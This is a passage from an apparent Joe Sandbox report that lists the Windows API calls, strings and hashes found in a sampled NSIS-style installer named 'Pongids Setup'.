                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            APIs
                                                                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405156
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405165
                                                                            • GetClientRect.USER32(?,?), ref: 004051A2
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004051A9
                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051CA
                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051DB
                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 004051EE
                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 004051FC
                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040520F
                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405231
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405245
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405266
                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405276
                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040528F
                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040529B
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405174
                                                                              • Part of subcall function 00403FBA: SendMessageA.USER32(00000028,?,00000001,00403DEB), ref: 00403FC8
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052B7
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000508B,00000000), ref: 004052C5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004052CC
                                                                            • ShowWindow.USER32(00000000), ref: 004052EF
                                                                            • ShowWindow.USER32(?,00000008), ref: 004052F6
                                                                            • ShowWindow.USER32(00000008), ref: 0040533C
                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                            • CreatePopupMenu.USER32 ref: 00405381
                                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405396
                                                                            • GetWindowRect.USER32(?,000000FF), ref: 004053B6
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053CF
                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040540B
                                                                            • OpenClipboard.USER32(00000000), ref: 0040541B
                                                                            • EmptyClipboard.USER32 ref: 00405421
                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 0040542A
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405434
                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405448
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405461
                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 0040546C
                                                                            • CloseClipboard.USER32 ref: 00405472
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: @y
                                                                            • API String ID: 590372296-2793234042
                                                                            • Opcode ID: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                                            • Instruction ID: 669047f9f67e304dd712f5be3c8e464dbcc99e7ae4a165c688d328355b6db051
                                                                            • Opcode Fuzzy Hash: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                                            • Instruction Fuzzy Hash: 9DA16970900249BFEF119FA0DD89EAE7F79EB08354F00806AFA05B61A0C7795E50DF69
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 0040494E
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404959
                                                                            • GlobalAlloc.KERNEL32(00000040,00000002), ref: 004049A3
                                                                            • LoadBitmapA.USER32(0000006E), ref: 004049B6
                                                                            • SetWindowLongA.USER32(?,000000FC,00404F2D), ref: 004049CF
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E3
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004049F5
                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404A0B
                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A17
                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A29
                                                                            • DeleteObject.GDI32(00000000), ref: 00404A2C
                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A57
                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A63
                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AF8
                                                                            • SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404B23
                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B37
                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404B66
                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B74
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404B85
                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C82
                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CE7
                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404CFC
                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D20
                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D40
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404D55
                                                                            • GlobalFree.KERNEL32(?), ref: 00404D65
                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DDE
                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404E87
                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E96
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EB6
                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F04
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F0F
                                                                            • ShowWindow.USER32(00000000), ref: 00404F16
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 1638840714-813528018
                                                                            • Opcode ID: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                                            • Instruction ID: 10d6cb261f95093856db0383de4589f8155b4d68da151c8c89fd000e0678f767
                                                                            • Opcode Fuzzy Hash: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                                            • Instruction Fuzzy Hash: AB027CB0900209AFEB14DF64DC85AAE7BB9FB84314F10817AF610BA2E1D7789D51CF58
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404412
                                                                            • SetWindowTextA.USER32(00000000,?), ref: 0040443C
                                                                            • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 004044ED
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004044F8
                                                                            • lstrcmpiA.KERNEL32(Call,0079E540), ref: 0040452A
                                                                            • lstrcatA.KERNEL32(?,Call), ref: 00404536
                                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404548
                                                                              • Part of subcall function 0040557A: GetDlgItemTextA.USER32(?,?,00000400,0040457F), ref: 0040558D
                                                                              • Part of subcall function 0040600B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\nRNzqQOQwk.exe",765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                                              • Part of subcall function 0040600B: CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                                              • Part of subcall function 0040600B: CharNextA.USER32(?,"C:\Users\user\Desktop\nRNzqQOQwk.exe",765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                                              • Part of subcall function 0040600B: CharPrevA.USER32(?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                                            • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404606
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404621
                                                                              • Part of subcall function 0040477A: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                                              • Part of subcall function 0040477A: wsprintfA.USER32 ref: 00404820
                                                                              • Part of subcall function 0040477A: SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: @y$A$C:\Users\user\slavelivets$Call
                                                                            • API String ID: 2624150263-2138057794
                                                                            • Opcode ID: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                                            • Instruction ID: b79cf5757fdebc40129ea8bf430174fd55c22843b8008fc959c2d10819856cf3
                                                                            • Opcode Fuzzy Hash: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                                            • Instruction Fuzzy Hash: A3A170B1900209ABDB11EFA5CC45BAF77B8EF85314F10843BF611B62D1E77C9A418B69
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                                            Strings
                                                                            • C:\Users\user\slavelivets, xrefs: 0040218C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                            • String ID: C:\Users\user\slavelivets
                                                                            • API String ID: 123533781-1403250623
                                                                            • Opcode ID: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                                            • Instruction ID: 3b959fe0d73b6f2ff8ba1a3dad26e84ad0429d5bc67268e837327fa781b0949d
                                                                            • Opcode Fuzzy Hash: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                                            • Instruction Fuzzy Hash: 705116B5E00208BFCB00DFE4C988A9DBBB6EF48314B2445AAF515FB2D1DA799941CB54
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040271A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                                            • Instruction ID: 3ccff3199aeab2db1e2dd923352da36f4292fa18247536f83ce369c7762b159a
                                                                            • Opcode Fuzzy Hash: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                                            • Instruction Fuzzy Hash: 76F05572604110EFD700EBA49A089FEB768DF15324FA0407BF181F20C0CBBC8A429B2A
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AEE
                                                                            • ShowWindow.USER32(?), ref: 00403B0B
                                                                            • DestroyWindow.USER32 ref: 00403B1F
                                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B3B
                                                                            • GetDlgItem.USER32(?,?), ref: 00403B5C
                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B70
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403B77
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403C25
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403C2F
                                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403C49
                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C9A
                                                                            • GetDlgItem.USER32(?,?), ref: 00403D40
                                                                            • ShowWindow.USER32(00000000,?), ref: 00403D61
                                                                            • EnableWindow.USER32(?,?), ref: 00403D73
                                                                            • EnableWindow.USER32(?,?), ref: 00403D8E
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DA4
                                                                            • EnableMenuItem.USER32(00000000), ref: 00403DAB
                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DC3
                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DD6
                                                                            • lstrlenA.KERNEL32(0079E540,?,0079E540,Pongids Setup), ref: 00403DFF
                                                                            • SetWindowTextA.USER32(?,0079E540), ref: 00403E0E
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403F42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                            • String ID: @y$Pongids Setup
                                                                            • API String ID: 184305955-1393332770
                                                                            • Opcode ID: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                                            • Instruction ID: 1a58b870ca21ce47ba752d56327be38b30dd2316994c96cb4837d6e7696a1104
                                                                            • Opcode Fuzzy Hash: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                                            • Instruction Fuzzy Hash: 81C1AF71904201ABEB216F61ED89E2A7EBCEB4570AF40853EF601B11F1C73DA941DB1E
                                                                            APIs
                                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404159
                                                                            • GetDlgItem.USER32(00000000,000003E8), ref: 0040416D
                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040418B
                                                                            • GetSysColor.USER32(?), ref: 0040419C
                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041AB
                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041BA
                                                                            • lstrlenA.KERNEL32(?), ref: 004041BD
                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041CC
                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004041E1
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404243
                                                                            • SendMessageA.USER32(00000000), ref: 00404246
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404271
                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042B1
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004042C0
                                                                            • SetCursor.USER32(00000000), ref: 004042C9
                                                                            • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 004042DC
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004042E9
                                                                            • SetCursor.USER32(00000000), ref: 004042EC
                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404318
                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040432C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                            • String ID: Call$N$open
                                                                            • API String ID: 3615053054-2563687911
                                                                            • Opcode ID: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                                            • Instruction ID: 601bc5fe35b3c5de407f3786c3433e5d67f1b6e9b87549a619d2750a8ed94523
                                                                            • Opcode Fuzzy Hash: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                                            • Instruction Fuzzy Hash: 6B61A5B1A40209BFEB109F61CC45F6A7B79FB84705F108026FB05BA2D1C7B8A951CF58
                                                                            APIs
                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextA.USER32(00000000,Pongids Setup,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F$Pongids Setup
                                                                            • API String ID: 941294808-3581732227
                                                                            • Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                            • Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
                                                                            • Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                            • Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                            APIs
                                                                            • lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405C7C,?,?), ref: 00405AF8
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C7C,?,?), ref: 00405B1C
                                                                            • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405B25
                                                                              • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                                              • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                                            • GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405B42
                                                                            • wsprintfA.USER32 ref: 00405B60
                                                                            • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B9B
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405BAA
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                            • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C38
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405C49
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C50
                                                                              • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 00405A17
                                                                              • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                            • API String ID: 222337774-4148678300
                                                                            • Opcode ID: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                            • Instruction ID: 1eed59494e777df17b5db6228b66ba1829f219dd2eba3e9b173e6ae731b9f24b
                                                                            • Opcode Fuzzy Hash: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                            • Instruction Fuzzy Hash: 503125B0A08B05ABE6203B615D48F6B3A5CDF45794F14053BFE01F62D2DA7CAC408EAD
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
                                                                            • MulDiv.KERNEL32(00095409,00000064,00096960), ref: 00402C59
                                                                            • wsprintfA.USER32 ref: 00402C69
                                                                            • SetWindowTextA.USER32(?,?), ref: 00402C79
                                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: T$`i$verifying installer: %d%%
                                                                            • API String ID: 1451636040-1135715120
                                                                            • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                            • Instruction ID: 21607a1dc9e24acd8111b7ab95824f47c5a1c8f1a2671c4e1062bfa223269d08
                                                                            • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                            • Instruction Fuzzy Hash: 8B014F70944209FBEF209F60DD4AEAE37A9AB04304F008039FA16A92D0D7B89951CB59
                                                                            APIs
                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\nRNzqQOQwk.exe",765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\nRNzqQOQwk.exe",765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                                            • CharPrevA.USER32(?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040600C
                                                                            • *?|<>/":, xrefs: 00406053
                                                                            • "C:\Users\user\Desktop\nRNzqQOQwk.exe", xrefs: 00406047
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-16102510
                                                                            • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                            • Instruction ID: 5800177166b7667d3eaf53a22357e4554d28550b3292ec339307e94a63baae70
                                                                            • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                            • Instruction Fuzzy Hash: 5011276184479129FB3296384C00B7B6FD94F567A0F19007BE9C6722C2C67C5C62836D
                                                                            APIs
                                                                            • GetWindowLongA.USER32(?,000000EB), ref: 00404009
                                                                            • GetSysColor.USER32(00000000), ref: 00404025
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404031
                                                                            • SetBkMode.GDI32(?,?), ref: 0040403D
                                                                            • GetSysColor.USER32(?), ref: 00404050
                                                                            • SetBkColor.GDI32(?,?), ref: 00404060
                                                                            • DeleteObject.GDI32(?), ref: 0040407A
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404084
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                            • Instruction ID: c3620b6f473fad47e7a0c0791398936244beda297bc66feae6272bbc27e0e58c
